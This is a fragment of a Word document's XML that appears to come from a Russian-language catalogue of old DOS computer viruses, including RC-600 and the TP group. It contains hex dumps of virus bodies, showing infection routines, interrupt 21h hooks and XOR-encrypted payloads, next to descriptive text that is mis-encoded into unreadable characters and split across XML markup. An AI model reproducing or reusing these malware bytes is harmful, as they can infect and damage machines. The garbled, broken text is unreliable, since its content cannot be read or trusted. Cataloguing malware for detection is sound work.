64 20 6e 6f 20 70 6c 61    " work and no pla"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0:  79 20 6d 61 6b 65 20 79 6f 75 20 61 20 64 75 6c    "y make you a dul"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0:  6c 20 62 6f 79 21 0a 0d 43 6f 6d 65 20 6f 6e 20    "l boy!..Come on "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>02b0:  21 20 4c 65 74 27 73 20 67 6f 20 6f 75 74 20 61    "! Let's go out a"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>02c0:  6e 64 20 68 61 76 65 20 73 6f 6d 65 20 66 75 6e    "nd have some fun"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>02d0:  21 24 9c 80 fc ff 75 05 b8 00 04 9d cf 80 fc dd    "!$....u....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0:  74 0e 3d 00 4b 75 03 eb 35 90 9d 2e ff 2e 17 00    "t.=.Ku..5..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02f0:  58 58 b8 00 01 2e a3 0a 00 58 2e a3 0c 00 f3 a4    "XX.......X.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0:  9d 2e a1 0f 00 2e ff 2e 0a 00 33 c9 b8 01 43 cd    "..........3...C."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0:  21 b4 41 cd 21 b8 00 4b 9d 2e ff 2e 17 00 2e 80    "!.A.!..K...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0:  3e 0e 00 01 74 e4 2e c7 06 70 00 ff ff 2e c7 06    "&gt;...t....p.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0:  8f 00 00 00 2e 89 16 80 00 2e 8c 1e 82 00 50 53    ".............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0:  51 52 56 57 1e 06 fc 8b fa 32 d2 80 7d 01 3a 75    "QRVW.....2..}.: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  ...   ...   ...    ...   ...    ...   ...    ...   ...    ...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d0:  1f c5 16 80 00 2e 8b 0e 72 00 b8 01 43 cd 21 8d    "........r...C.!."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>05e0:  16 1b 00 b8 24 25 cd 21 07 1f 5f 5e 5a 59 5b 58    "....$%.!.._^ZY[X"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>05f0:  9d 2e ff 2e 17 00 fc 03 00 00 00 00 00 00 00 00    "...........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0:  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    "...........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0610:  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    "...........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0620:  00 00 00 00 00 00 00 00 00 00 2c 08 25 46 00 08    "..........,.%F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0630:  25 08 25 c6 07 16 02 6c 15 40 00 3c fc 04 00 0d    "%.%....l.@.&lt;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0640:  c9 7e 93 00 01 07 02 d4 00 f5 1e 55 c8 55 6c fe    ".~.........U.U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0650:  b9 8b 00 80 3e eb 54 a2 4c 80 00 3e 00 43 56 90    "....&gt;.T.L..&gt;.CV."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0660:  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    "...........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0670:  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 cd    "...........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0680:  20 c8 f7 e1 ee e7                                  " .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4. ����� RC-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⠬�  �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬�� RC-529 � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ��� ⮫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쪮 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-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R�-600 ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">१������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騬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. ����� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஢���� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MS DOS, �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ன �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭪樮���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-��������, �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ��ᯮᮡ�� �� ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稭�� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2.0.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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㧪� �� � ������ ��� �믮������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>21-4B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ࠦ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� ⨯� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ���� �᫨ ��� ����� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>७�� 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६� ᮧ����� ��ࠦ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� �� ����������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  � ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㢥��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600 ����. �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭠� ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠢��� 600 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�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮤ�ঠ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騥 � ����� ���� ����� ���祭��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ॢ�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60h,  �  ⠪��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��  �  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਡ�⮬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  READ  ONLY.  �����  ��  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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墠�뢠�� ���뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2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⨯� ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� ����� ����ᮬ ������⭮</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� �⮬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ᮧ����� �� �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  � ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㢥��稢����� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>600 ���⮢.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�� �ணࠬ�� ⥫� ����� ࠧ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>頥��� � ��砫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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᢮��� ⥫� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(50 ����, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稭�� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>16 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砫�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>) � ���� 600 ���� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� �ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(���⮪ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>७�ᨬ�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䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>) � ������� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">樨 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>XOR 0BBh � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">७������ � ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">頥��� ⥫� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(⮦� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>筮 ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஢����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-  5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稭�� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>17-�� - XOR 0DD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।������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, ������� �� � ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������ �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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⠭����� ��� ������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯯� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮢ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>堭���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>:  �����  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뤠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㥬�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MS DOS ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>21-AB, � ��⥬ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢���� ᮤ�ন��� ॣ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X.  �� ������ �������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮧ����� १����⭮�  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樭�  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����  � ������� ����� ���������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �� ����⪥ ��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 �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祪 ⨯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>NC �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>設�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �᫨ COMMAND.COM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�� �� ���饭��� �� ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪥</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ந�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">室�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믠�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" �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⪥ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ������� �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭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᪥� ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥣ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">) ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭�� �� �易�� �  ⥬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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮤ�ন� ����ணࠬ�� ��ࠡ�⪨ ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>27,  �� ���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ॠ�������� ����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ଠ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饥 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� �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R�E-600 ����� � ���� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">砫� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1990 ����.  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦥� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.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ᮩ � ����ய��஢᪥ � �।��� ��५� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1990�. ����⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ணࠬ��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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ᥭ���� ����� �����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"  ��  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>塞� 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䠣� � ������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ࠣ���� ����� �ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DUMY, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� ����ᮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RC-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�� ��������, �� ����� 90h ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">४���஢��� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>BB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: BE 10 01 B9 32 00 8A 24  80 F4 DD 88 24 46 E2 F6   ....2..$....$F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: 69 76 10 FC E0 88 88 A8  DE 34 53 DD 51 15 F0 DC   iv.......4S.Q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: DD 53 05 66 DE DD E3 56  DA F0 5D DD E3 54 DA D3   .S.f...V..]..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0: C2 66 DF DD 56 DA F0 5D  DD 54 DA 53 1D 62 DD DD   .f..V..].T.S.b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: 63 DD 00 B9 00 08 F3 A4  8B D0 EB 2E 90 FB 80 FC   c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0: AB 75 04 B8 55 55 CF 50  FE C4 3D 00 4C 58 75 15   .u..UU.P..=.LXu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0: 9C 50 53 51 52 56 57 06  1E E9 9E 00 1F 07 5F 5E   .PSQRVW......._^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 5A 59 5B 58 9D EA 1C 02  BC 12 8E DA B8 21 35 CD   ZY[X.........!5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0: 21 3E 89 1E 76 01 3E 8C  06 78 01 3E 89 1E 42 02   !&gt;..v.&gt;..x.&gt;.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0: 3E 8C 06 44 02 1E 8C C0  8E D8 8B D3 1F 8D 16 4D   &gt;..D...........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0: 01 B8 21 25 CD 21 0E 1F  1E 07 BE D4 01 B9 00 01   ..!%.!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B0: BB EC 01 8B 3F 83 FF 00  75 02 CD 20 57 BB EE 01   ....?...u.. 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0: 8B 07 01 C7 81 C7 00 01  FC 57 F3 A4 5F 58 8B 0E   .........W.._X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0: EE 01 57 C3 05 00 01 8B  F0 BF 00 01 FC 8A 04 34   ..W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0: BB 88 05 46 47 E2 F6 B8  00 01 50 C3 60 02 58 02   ...FG.....P.`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F0: 56 05 E0 0F 55 76 7F 63  74 73 71 75 60 00 49 34   V...Uv.ctsqu`.I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: 36 2B 23 23 2A 00 00 00  00 CF 8B DA 1E 52 06 0E   6+##*........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...   ...   ...   ...    ...   ...   ...   ...     ...   ...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0: 03 00 E9 27 FE B8 00 3E  CD 21 8B 1E F0 01 8E 06   ...'...&gt;.!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0: F2 01 B8 24 25 CD 21 C3  38 20 81 80 89 92 8E 82   ...$%.!.8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0: 02 90 BB 05 AE BA 95 31  AF 0F B9 76 9A FD 59 4D   .......1...v..YM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0: 01 BB BB 76 9B B1 B6 26  29 35 29 9B 2F 3B 32 30   ...v...&amp;)5)./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0: 9B 2A 35 3F 3E 2B 3D 33  29 9B 39 33 2B 28 2A 9B   .*5?&gt;+=3).93+(*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0: ED 8D 8B 8B 9B 9B 9B 93  E9 F8 9B 8D 8B 8B 92 9A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0: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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B0: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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C0: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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D0: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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0: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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F0: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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0: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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0: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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0: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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0: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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0: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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0: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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0: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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70: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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80: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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90: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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A0: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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B0: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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C0: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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D0: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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E0: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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F0: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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0: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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0: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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20: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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30: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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0: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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50: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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60: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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70: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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80: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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90: BB BB BB BB BB BB BB BB  BB BB BB BB BB BB BB BB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A0: 3F 30 33 36 3B 9B 2C 33  2A 29 35 38 35 9B 2F 3B   ?036;.,3*)585./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B0: 32 30 3B 9B 96 9B 8D 8B                            20;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5. ��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࢮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>��५�᪠� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࢮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>�५�᪠� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㯯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠪�� �⭮���� � ������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯯� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮢ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祬  �  ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>FU MANCHU.  � �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饥 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६� �� ������ � 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뤥���� � ���⮬� ������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᢥ����� � ��� �ਢ������  �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.4. ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㯯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>TP-�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 xml:space="preserve">㯯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������� ����ᮢ  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��-��������,  ����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>宦�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �  ��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">室�� ���浪� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>50 �⫨������ ��� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㣠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ᮬ����� �ਭ�������� ������ ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬���.  ����� �� �⠬�� �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 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祢�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  ����� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮡ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਧ����� ����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 � �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">(� ����� ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⢮��� � �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮧ�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��᪮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 ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>[13] ᫨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>誮� � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஡��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠪ�୮� ᪮॥ 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祬 ��� ��᫥����⥫�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>窨 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>७�� ���ᠭ� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>孨�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>襭��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>拉 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬��� �⮩ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯯�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>;  ����� ⮣�, ��� ��⨢���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᭠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��� �⮩ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯯� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᮢ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(TP48CLS) ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠��  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬��  ��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⮬�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  ��� �� ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祬 � ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">[13] </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㪠����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,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஬ ����� �� ࠧࠡ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠭ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠣 ��� �⮩ ��㯯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㯯�  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(!)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設�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠢�⥫�� �⮩ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯯�  �⫨�⥫�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ப� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>F47A � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">砫� � ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஬� ���ᨨ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>TP45 (2Dh) )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� ���� ����� �� �⮩ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ப�� ᫥��� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬��. 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ਢ������ ���� ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ���� F4 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ����� � ᬥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">饭��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>4 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7A - � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᬥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">饭��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3.  ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
